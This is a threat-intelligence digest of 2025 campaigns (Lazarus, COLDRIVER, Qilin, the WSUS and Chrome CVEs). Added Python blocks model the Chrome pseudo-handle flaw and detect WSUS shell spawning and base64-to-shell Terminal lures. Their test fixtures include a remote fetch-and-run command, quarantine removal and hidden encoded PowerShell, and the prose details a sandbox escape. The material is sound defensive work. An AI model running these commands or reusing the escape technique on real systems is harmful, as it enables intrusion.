Russian-linked attackers conducted multi-month intrusions against Ukrainian organizations, including a two-month campaign against a business services organization and a week-long attack against a local government entity. The attackers gained initial access by exploiting unpatched vulnerabilities on public-facing servers and then deployed the LocalOlive webshell (associated with Sandworm/Seashell Blizzard). They relied heavily on Living-off-the-Land tactics and dual-use tools to maintain persistent access, harvest credentials, perform memory dumps, establish remote access via RDP and OpenSSH, and exfiltrate sensitive information while keeping a minimal footprint. The intrusions involved reconnaissance, credential harvesting through memory dumps targeting KeePass, registry manipulation, firewall modifications, and the deployment of PowerShell backdoors and suspicious executables across multiple compromised systems.
Lab52 identified sophisticated modular loaders used by the Lazarus group in DreamJob campaigns during August 2025. The campaign, dubbed 'DreamLoaders', uses several deployment methods that abuse legitimate system executables for DLL sideloading. The attackers target administrators within organizations so that the malware runs with enough privilege for credential extraction and further compromise. Three deployment variants were observed: a trojanized TightVNC client (tnsviewer.exe), DLL loaders (webservices.dll and radcui.dll) executed via legitimate Windows binaries, and TSVIPSrv.dll deployed as a malicious service. The loaders decrypt and load modular payloads stored in .mui files; one module, HideFirstLetter.dll, attempts authentication to Microsoft tenants and accesses SharePoint servers via the Microsoft Graph API. The modular architecture allows different payloads to be deployed according to operational needs, and identical payloads found across multiple compromised systems indicate coordinated targeting.
The Aisuru botnet, which has infected at least 700,000 IoT devices since August 2024, has been overhauled to transition from conducting massive DDoS attacks to operating as a residential proxy service. The botnet previously executed record-breaking DDoS attacks reaching 6.3 terabits per second against KrebsOnSecurity and demonstrated capabilities of nearly 30 terabits per second. The botmasters updated their malware to enable infected devices to be rented to residential proxy providers, allowing cybercriminals to anonymize their traffic through compromised IoT devices including routers and security cameras. This shift supports large-scale data harvesting and AI content scraping operations. The botnet's infrastructure includes an SDK that forces Android-infected systems to query specific domains. Multiple ISPs have experienced significant operational impact with outbound DDoS attacks exceeding 1.5 terabits per second from Aisuru-infected customer devices, causing network disruptions and router line card failures. The botnet appears to have partnerships with various proxy networks and is contributing to the massive expansion of residential proxy services used for content scraping, ad fraud, credential stuffing, and AI training data collection.
Kaspersky discovered Operation ForumTroll in March 2025, a sophisticated espionage campaign targeting media outlets, universities, research centers, government organizations, and financial institutions in Russia and Belarus. The attack used personalized spear-phishing emails disguised as invitations to the Primakov Readings forum and containing extremely short-lived malicious links. Infection occurred through a zero-day Chrome sandbox escape exploit (CVE-2025-2783) that required no user interaction beyond visiting the malicious website in a Chromium-based browser. The exploit leveraged a logic flaw in the handling of Windows pseudo handles: the GetCurrentThread API returns the pseudo handle -2, and Chrome's IPC code checked for -1 (GetCurrentProcess) but not for -2. This allowed the attackers to use RelayMessage to have the pseudo handle converted, via DuplicateHandle, into a real handle to a browser-process thread, enabling arbitrary code execution through thread manipulation (suspend, SetThreadContext, resume). Persistence was achieved via COM hijacking of twinapi.dll using CLSID {AA509086-5Ca9-4C25-8F95-589D3C07B48A}. The campaign deployed LeetAgent spyware, whose command identifiers are written in leetspeak (0xC033A4D=COMMAND, 0xECEC=EXEC, etc.), performing keylogging, file theft (targeting .doc, .xls, .ppt, .rtf, .pdf extensions), and command execution. Kaspersky traced related attacks back to 2022 and discovered Dante, a commercial surveillance tool developed by Memento Labs (formerly Hacking Team). Dante is VMProtect-packed and carries extensive anti-analysis techniques, including anti-hooking via system call stubs, debug register checks, Windows Event Log monitoring for analysis tools, and anti-sandbox checks. The malware uses an orchestrator architecture with AES-256-CBC encrypted modules, stores its configuration alongside the string DANTEMARKER, and deletes itself after a specified number of days without C2 communication. Attribution was confirmed through code similarities between the exploit, the loader, and Dante, plus shared C2 infrastructure fronted by the Fastly.net CDN. Mozilla Firefox was affected by a similar flaw (CVE-2025-2857).
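The pseudo-handle check is easy to get wrong because a HANDLE is a pointer-sized value that the kernel compares as a signed integer, and there are more pseudo handles than the two everyone remembers. The block below is an added model of that check, not Chrome's code or anything from Kaspersky's writeup: the constants are the documented Windows pseudo handles, and the two validators plus relay() are a simplified model of the broker-side check described above (the assumption being that the broker examines the raw HANDLE value before calling DuplicateHandle on the sandbox's behalf).

```python
"""Added model of the pseudo-handle check behind CVE-2025-2783 (Operation ForumTroll).

Not Chrome's code. The handle values are the documented Windows pseudo handles from
processthreadsapi.h; the two validators and relay() are a simplified model of the
browser-side check the writeup describes (assumption: the broker compares the raw
HANDLE value before calling DuplicateHandle on the sandbox's behalf).
"""

# Pseudo handles are negative pointer-sized constants. GetCurrentProcess() is -1,
# which is also INVALID_HANDLE_VALUE; GetCurrentThread() is -2.
PSEUDO_HANDLES = {
    -1: "GetCurrentProcess / INVALID_HANDLE_VALUE",
    -2: "GetCurrentThread",
    -4: "GetCurrentProcessToken",
    -5: "GetCurrentThreadToken",
    -6: "GetCurrentThreadEffectiveToken",
}


def as_signed(raw, bits=64):
    """Interpret a raw HANDLE bit pattern as a signed value of the given width.

    An IPC layer that reads handles as unsigned integers sees 0xFFFFFFFFFFFFFFFE;
    the kernel treats that as -2, so the comparison must be made on the signed form.
    """
    raw &= (1 << bits) - 1
    return raw - (1 << bits) if raw >> (bits - 1) else raw


def vulnerable_accepts(handle, bits=64):
    """Pre-fix shape of the check: only the process pseudo handle (-1) is refused."""
    return as_signed(handle, bits) != -1


def hardened_accepts(handle, bits=64):
    """Refuse NULL and every pseudo handle, not just -1."""
    h = as_signed(handle, bits)
    return h > 0 and h not in PSEUDO_HANDLES


def relay(accepts, handle, bits=64):
    """Model of the broker relaying a sandbox-supplied handle through DuplicateHandle.

    As the writeup describes, a pseudo thread handle (-2) that survives validation is
    turned by DuplicateHandle into a real handle to a browser-process thread, which the
    sandboxed process can then suspend, SetThreadContext and resume.
    """
    if not accepts(handle, bits):
        return "rejected"
    h = as_signed(handle, bits)
    if h == -2:
        return "browser-thread-handle"
    if h == -1:
        return "browser-process-handle"
    if h in PSEUDO_HANDLES:
        return "other-pseudo-handle"   # token pseudo handles; not modelled further
    return "sandbox-object-handle"     # an ordinary handle owned by the sandbox


if __name__ == "__main__":
    smuggled = 0xFFFFFFFFFFFFFFFE   # how -2 looks when the IPC layer reads it unsigned
    print("vulnerable:", relay(vulnerable_accepts, smuggled))   # browser-thread-handle
    print("hardened:  ", relay(hardened_accepts, smuggled))     # rejected
```

The point of the signed conversion is that a filter written as `handle != 0xFFFFFFFFFFFFFFFF` or `handle != -1` on its own passes -2 straight through; rejecting the whole pseudo-handle range (and anything non-positive) closes the class of bug rather than the single case.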
Qilin (formerly Agenda) is a highly active Ransomware-as-a-Service (RaaS) group that has been operational since July 2022. Through 2025 it published victim data at a rate of more than 40 cases per month, peaking at around 100 cases in June 2025. The group employs double-extortion tactics, combining file encryption with data exfiltration and public disclosure threats. Manufacturing is the most affected sector (23%), followed by professional and scientific services (18%) and wholesale trade (10%). The group's tradecraft includes VPN compromise via leaked credentials, credential harvesting with Mimikatz and custom tools, dual ransomware deployment (encryptor_1.exe pushed via PsExec for lateral spread and encryptor_2.exe for network share encryption), legitimate tools for data exfiltration (Cyberduck to Backblaze cloud storage), and persistence through scheduled tasks and registry modifications. Character encodings in attacker scripts suggest Eastern European or Russian-speaking origins. The group targets critical infrastructure including the healthcare, construction, retail, education, and finance sectors.
The Pakistan-nexus threat actor APT36 (Transparent Tribe) has been observed targeting Indian government entities through spear-phishing attacks designed to deliver a Golang-based malware known as DeskRAT. The campaign, observed in August and September 2025, involves phishing emails containing ZIP file attachments or links to archives hosted on legitimate cloud services such as Google Drive. The attacks specifically target BOSS (Bharat Operating System Solutions) Linux systems with a remote access trojan that establishes command-and-control over WebSockets. The malware supports multiple persistence mechanisms and file exfiltration. The threat actor has transitioned from legitimate cloud storage platforms to dedicated staging servers for payload distribution.
Microsoft released emergency out-of-band security updates to patch CVE-2025-59287, a critical remote code execution vulnerability in Windows Server Update Services (WSUS). The flaw is unsafe deserialization of untrusted data in a legacy serialization path that uses BinaryFormatter. An unauthenticated remote attacker can exploit it by sending crafted requests to the GetCookie() endpoint, where encrypted AuthorizationCookie objects are decrypted with AES-128-CBC and deserialized without type validation, leading to remote code execution with SYSTEM privileges. The vulnerability has a CVSS score of 9.8 and is actively exploited in the wild. Eye Security observed exploitation on October 24, 2025, in which attackers dropped a Base64-encoded .NET executable that runs, via cmd.exe, whatever command is supplied in an 'aaaa' HTTP request header. The vulnerability affects Windows Server 2012, 2012 R2, 2016, 2019, 2022, and 2025 when the WSUS server role is enabled. Microsoft recommends immediate patching or, as a workaround, disabling the WSUS server role or blocking inbound traffic to ports 8530 and 8531.
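Until the out-of-band update is on every WSUS host, the most reliable signal of the exploitation described above is the process tree: the WSUS request path has no business launching a shell. The block below is an added detection example, not Microsoft's or Eye Security's code. It triages Sysmon Event ID 1 (process creation) records, constructed inline here, on the assumption that the WSUS role runs either in wsusservice.exe or in an IIS worker process (w3wp.exe) started for the "WsusPool" application pool, and it decodes any PowerShell -EncodedCommand argument it finds so the analyst sees the plaintext.

```python
"""Added detection example for the post-exploitation shape described for CVE-2025-59287.

Not Microsoft's or Eye Security's code. It scans Sysmon Event ID 1 (process creation)
records, here constructed inline, for shells spawned by the WSUS server role.
Assumptions: the WSUS request path runs either in wsusservice.exe or in an IIS worker
(w3wp.exe) started for the "WsusPool" application pool; neither should ever launch
cmd.exe or PowerShell on a healthy server.
"""
import base64
import re
from pathlib import PureWindowsPath

WSUS_SERVICE = "wsusservice.exe"
IIS_WORKER = "w3wp.exe"
WSUS_APP_POOL = "wsuspool"   # default pool name, matched against w3wp's -ap argument
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENC_RE = re.compile(r"[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def image_name(path):
    return PureWindowsPath(path).name.lower()


def is_wsus_parent(ev):
    parent = image_name(ev["ParentImage"])
    if parent == WSUS_SERVICE:
        return True
    if parent == IIS_WORKER:
        # Scope to the WSUS pool so other IIS sites on the host do not fire this rule.
        return WSUS_APP_POOL in ev.get("ParentCommandLine", "").lower()
    return False


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Return one finding per shell spawned by a WSUS parent process."""
    hits = []
    for ev in events:
        if not is_wsus_parent(ev) or image_name(ev["Image"]) not in SHELLS:
            continue
        cmd = ev.get("CommandLine", "")
        hits.append({
            "utc": ev["UtcTime"],
            "parent": image_name(ev["ParentImage"]),
            "image": image_name(ev["Image"]),
            "command": cmd,
            "decoded": decode_encoded_command(cmd),
        })
    return hits


# Constructed sample records (not real telemetry).
ENC_WHOAMI = base64.b64encode("whoami".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {   # IIS worker for the WSUS pool spawning cmd.exe -> flag
        "UtcTime": "2025-10-24 03:14:07",
        "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "ParentCommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "WsusPool" -v "v4.0" -l "webengine4.dll"',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": f"cmd.exe /c powershell -nop -w hidden -enc {ENC_WHOAMI}",
    },
    {   # a different application pool on the same host -> out of scope for this rule
        "UtcTime": "2025-10-24 03:15:00",
        "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "ParentCommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v4.0"',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami",
    },
    {   # the WSUS service itself spawning cmd.exe -> flag
        "UtcTime": "2025-10-24 03:16:30",
        "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
        "ParentCommandLine": r'"C:\Program Files\Update Services\Service\WsusService.exe"',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt",
    },
    {   # an administrator's interactive shell -> benign
        "UtcTime": "2025-10-24 03:17:00",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": "C:\\Windows\\Explorer.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
    },
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Scoping the w3wp.exe rule to the WSUS pool keeps the rule quiet on servers that also host other IIS applications; if WSUS is the only site on the box, dropping that condition is the safer choice.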
North Korea-aligned Lazarus Group conducted a cyber-espionage campaign targeting European defense contractors involved in UAV/drone manufacturing in Central and Southeastern Europe. The campaign, part of Operation DreamJob, aimed to steal proprietary information and manufacturing know-how related to unmanned aerial vehicles. Three organizations were targeted, some of which produce military equipment currently deployed in Ukraine. The attackers used social engineering with fake job offers via LinkedIn, delivering trojanized open-source projects taken from GitHub (including a trojanized PDF reader) that dropped the ScoringMathTea RAT. The campaign aligns with North Korea's efforts to scale up its domestic drone program and may be connected to the North Korean military presence in Russia during the Ukraine conflict.
China-based threat actors exploited the SharePoint ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East, government agencies in Africa and South America, and other organizations. The campaign involved deploying the Zingdoor backdoor, the ShadowPad Trojan, KrustyLoader, and various post-exploitation tools for credential theft and persistent access, most likely for espionage.
A multi-wave espionage campaign by the SideWinder APT group targeted governmental entities in South Asia (India, Pakistan, Bangladesh, Sri Lanka) from March to September 2025. The campaign employed novel PDF- and ClickOnce-based infection chains alongside traditional Word exploit vectors to deploy the ModuleInstaller and StealerBot malware. The threat actors used evasion techniques including geofencing, polymorphism, dynamic URLs, and time-locked payload delivery. They targeted diplomatic institutions and government officials with highly specific phishing lures themed around regional political events, religious ceremonies (Hajj), military appointments, and inter-ministerial meetings, and abused the legitimate MagTek Reader Configuration application for DLL sideloading, keeping a valid certificate chain on the host executable to evade detection while delivering multi-stage payloads.
A complex cyberespionage campaign targeted government, financial, and industrial organizations in Asia, Africa, and Latin America. The attackers compromised Windows Server machines through SQL Server exploitation and deployed custom APT implants (Neursite and NeuralExecutor) together with the Cobalt Strike framework. The attack uses multi-stage DLL loading chains with MAC address-based targeting and Phantom DLL Hijacking for persistence.
Russian state-sponsored threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) swiftly shifted operations after the May 2025 public disclosure of its LOSTKEYS malware, operationalizing new malware families within five days. The threat actor has deployed a collection of related malware families connected via a delivery chain, including NOROBOT (also known as BAITSWITCH), YESROBOT, and MAYBEROBOT (also known as SIMPLEFIX). The infection chain begins with an updated COLDCOPY 'ClickFix' lure disguised as a CAPTCHA that tricks users into executing a malicious DLL via rundll32. NOROBOT serves as a downloader that retrieves subsequent stages from hardcoded C2 servers. Initially, COLDRIVER deployed YESROBOT, a cumbersome Python backdoor requiring a full Python 3.8 installation, but quickly replaced it with MAYBEROBOT, a more flexible PowerShell backdoor. The malware has undergone multiple iterations with constant evolution in the infection chain, including simplification for deployment success and later re-introduction of complexity through split cryptography keys to evade detection. COLDRIVER targets high-profile individuals in NGOs, policy advisors, and dissidents for intelligence collection. The group demonstrates increased development tempo and aggressive deployment against high-value targets.
China's Ministry of State Security (MSS) claims the U.S. National Security Agency (NSA) conducted a multi-stage cyber attack targeting China's National Time Service Center (NTSC), which is responsible for maintaining Beijing Time. The attack involved exploiting SMS service vulnerabilities, credential theft, and deployment of 42 specialized cyber warfare tools.
Salt Typhoon (aka Earth Estries, GhostEmperor, UNC2286), a China-linked cyber espionage APT group, conducted an intrusion against a European telecommunications organization in July 2025. The attack involved exploitation of Citrix NetScaler Gateway, DLL sideloading via legitimate antivirus software to deploy SNAPPYBEE backdoor, and use of VPS infrastructure for command and control. Darktrace detected early-stage intrusion activity including tooling delivery and C2 communications before escalation.
According to the MSS account, the NSA ran a multi-stage campaign against China's National Time Service Center from March 2022 to June 2024. The attack is said to have begun by exploiting vulnerabilities in foreign-brand mobile phones to steal credentials, followed by the deployment of custom malware frameworks to establish persistent access and conduct espionage against the center's timing infrastructure.
Nation-state hackers, suspected to be China-linked threat group UNC5291, breached F5's network and stole undisclosed BIG-IP security vulnerabilities and source code. The attackers were active in F5's network for at least one year. Following the disclosure, Shadowserver Foundation identified over 266,000 F5 BIG-IP instances exposed online, with nearly half located in the United States. F5 has released patches for 44 vulnerabilities including those stolen in the breach and urges immediate updates.
Threat actors exploited a recently patched remote code execution vulnerability (CVE-2025-20352) in Cisco networking devices to deploy a rootkit targeting Cisco switches and unprotected Linux systems. The campaign also attempted to exploit CVE-2017-3881, a Telnet vulnerability from 2017. The rootkit includes a UDP-based controller with capabilities to bypass security controls, manipulate logs, and enable lateral movement.
Cisco Talos uncovered a new attack linked to Famous Chollima (Lazarus subgroup), a DPRK-aligned threat actor targeting job seekers through fake employment offers. The campaign delivers trojanized Node.js applications containing evolved BeaverTail and OtterCookie malware with new keylogging, screenshotting, and data exfiltration capabilities. The malware was distributed via NPM package 'node-nvm-ssh' and targets cryptocurrency wallets, credentials, and sensitive files.
A coordinated campaign targets macOS users, particularly developers, through fake software download websites impersonating trusted platforms such as Homebrew, TradingView, and LogMeIn. The sites use social engineering to have the visitor paste a base64-encoded command into Terminal, which delivers the Odyssey Stealer and AMOS (Atomic macOS Stealer) malware.
A long-running cyber-espionage campaign by the Confucius APT group targeted Pakistani government agencies, military organizations, defense contractors, and critical industries. The campaign evolved from December 2024 through August 2025 and used weaponized Office documents, malicious LNK files, DLL side-loading, and the deployment of WooperStealer and the Python-based AnonDoor backdoor for persistent access and data exfiltration.
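A quick way to find this delivery method after the fact is to look at shell history for base64 blobs piped straight into a shell and decode them. The block below is an added detection example, not code from the campaign writeup: it scans zsh history lines constructed inline (the example.invalid URL and the /tmp paths are made up) for the two common shapes of that one-liner, decodes the payload, and tags the decoded command.

```python
"""Added detection example for the base64-in-Terminal delivery described above.

Not code from the campaign writeup. It scans shell history (constructed zsh history
lines below) for base64 blobs piped straight into a shell, decodes them and tags
the decoded commands. The URL and paths are constructed for the example.
"""
import base64
import binascii
import re

B64 = r"[\"']?(?P<b64>[A-Za-z0-9+/=]{16,})[\"']?"
DECODE = r"base64\s+(?:-d|-D|--decode)"      # macOS base64 accepts -D as well as -d
SHELL = r"(?:ba|z)?sh\b"

# Pattern A:  echo <b64> | base64 -d | sh
PIPE_RE = re.compile(rf"echo\s+{B64}\s*\|\s*{DECODE}\s*\|\s*{SHELL}")
# Pattern B:  sh -c "$(echo <b64> | base64 -d)"
SUBST_RE = re.compile(rf"{SHELL}\s+-c\s+[\"']\$\(\s*echo\s+{B64}\s*\|\s*{DECODE}\s*\)[\"']")

# What the decoded command is doing; order here is the order tags are reported in.
RISKY = [
    ("remote_fetch", re.compile(r"\b(?:curl|wget)\b")),
    ("pipe_to_shell", re.compile(rf"\|\s*{SHELL}")),
    ("applescript", re.compile(r"\bosascript\b")),
    ("quarantine_removal", re.compile(r"xattr\s+(?:-r\s+)?-d\s+com\.apple\.quarantine")),
    ("privilege", re.compile(r"\bsudo\b|with administrator privileges")),
]


def decode_payload(b64):
    """Strictly decode a base64 blob; None if it is not valid base64 text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def history_command(line):
    """Strip the zsh EXTENDED_HISTORY prefix ': <epoch>:<secs>;' if present."""
    m = re.match(r"^:\s*\d+:\d+;(.*)$", line)
    return m.group(1) if m else line


def scan_history(lines):
    """Return one finding per base64-to-shell one-liner, with decoded command and tags."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = history_command(raw.rstrip("\n"))
        m = PIPE_RE.search(cmd) or SUBST_RE.search(cmd)
        if not m:
            continue
        decoded = decode_payload(m.group("b64"))
        tags = [name for name, rx in RISKY if decoded and rx.search(decoded)]
        findings.append({"line": n, "command": cmd, "decoded": decoded, "tags": tags})
    return findings


def b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed history (the example.invalid URL and the paths are made up).
PAYLOAD_FETCH = "curl -fsSL http://example.invalid/setup.sh | bash"
PAYLOAD_UNQUARANTINE = "xattr -d com.apple.quarantine /tmp/Installer.app && open /tmp/Installer.app"
HISTORY = [
    ": 1730000000:0;git status",
    f": 1730000050:0;echo {b64(PAYLOAD_FETCH)} | base64 -d | bash",
    ": 1730000100:0;echo aGVsbG8gd29ybGQ= | base64 -d",   # decode only, no shell: ignored
    f": 1730000150:0;bash -c \"$(echo '{b64(PAYLOAD_UNQUARANTINE)}' | base64 -D)\"",
]

if __name__ == "__main__":
    for f in scan_history(HISTORY):
        print(f["line"], f["tags"], f["decoded"])
```

Run it against ~/.zsh_history (or ~/.bash_history) on a suspect machine; a hit whose decoded command fetches a remote script or strips the quarantine attribute is worth pulling the downloaded file and the resulting process tree for.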
